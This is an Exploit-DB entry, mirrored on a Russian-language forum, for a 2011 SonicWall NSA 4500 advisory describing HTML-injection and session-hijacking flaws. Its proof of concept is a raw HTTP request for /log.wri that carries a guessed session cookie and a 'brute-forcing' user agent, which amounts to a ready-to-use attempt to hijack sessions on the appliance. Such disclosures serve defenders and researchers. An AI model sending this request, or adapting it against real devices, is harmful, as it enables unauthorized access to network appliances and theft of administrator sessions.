- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36205
- Проверка EDB
-
- Пройдено
- Автор
- HUGO VAZQUEZ
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- null
- Дата публикации
- 2011-10-04
Код:
source: https://www.securityfocus.com/bid/49930/info
SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.
Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.
GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111- Источник
- www.exploit-db.com
